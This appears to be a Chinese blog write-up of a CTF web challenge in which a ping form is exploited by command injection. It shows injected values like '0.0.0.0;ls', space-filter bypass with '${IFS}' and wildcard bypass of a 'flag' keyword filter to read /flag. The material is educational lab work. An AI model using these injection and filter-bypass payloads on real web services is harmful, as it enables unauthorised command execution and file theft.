经典ctf ping题目详解 青少年CTF-WEB-PingMe02

题目环境:
image.png

根据题目名称可知
这是一道CTF-WEB方向常考的知识点:ping地址

随便ping一个地址
查看接受的数据包
?ip=0.0.0.0
image.png

有回显数据,尝试列出目录文件
堆叠命令使用’;'作为命令之间的连接符,当上一个命令完成后,继续执行下一个命令

使用堆叠命令
列出此目录下的文件
?ip=0.0.0.0;ls
image.png

ls是Linux系统里面的列出目录文件的命令
索性ls没有被过滤

查看隐藏文件
?ip=0.0.0.0;ls -a
image.png

space空格被过滤了

使用IFS绕过空格

IFS是Linux里面的环境变量,是其内部字段分隔符
可通过${IFS}绕过空格
$IFS$1-n(n>0的正整数)也可绕过空格

?ip=0.0.0.0;ls${IFS}-a
image.png

成功绕多空格
这里猜测没在根目录下,所以才没发现flag

查看当前路径
?ip=0.0.0.0;pwd
image.png

pwd是Linux系统里面查看当前目录/路径的命令
/var/www/html
可知现在是在html目录下
去看’/'根目录下是否有flag的存在

查看根目录下的文件
?ip=0.0.0.0;ls${IFS}/
image.png

发现根目录下存在flag文件

查看根目录下flag文件的内容
?ip=0.0.0.0;cat${IFS}/flag
image.png

cat是Linux系统里面最常见的查看文件内容的命令
这里可以使用其它查看文件内容的命令
less、more、nl等等

使用less查看flag内容
?ip=0.0.0.0;less${IFS}/flag
image.png

flag被过滤
可使用f*和f???进行绕过(注:f后边有几个字符就用几个?进行代替)
代表f开头的文件
因为f开头的文件只有flag这一个文件,所以查的就是flag

?ip=0.0.0.0;less${IFS}/f*
image.png
?ip=0.0.0.0;less${IFS}/f???
image.png
使用more查看flag内容
?ip=0.0.0.0;more${IFS}/f*
image.png
?ip=0.0.0.0;more${IFS}/f???
image.png
使用nl查看flag内容
?ip=0.0.0.0;nl${IFS}/f*
image.png
?ip=0.0.0.0;nl${IFS}/f???
image.png
得到flag:
qsnctf{3c6173ea-c3e2-4a49-858b-e9897e69cee3}

当然Linux系统查看文件内容的命令还有很多,这里就举着三个例子了
如果想效率更更高,我们还可以自己生成Linux常见列出目录文件和查看文件等命令和常用字符以及关键字的字典,并使用BurpSuite进行爆破查看那个命令和字符以及关键字的过滤情况

  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白猫a~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值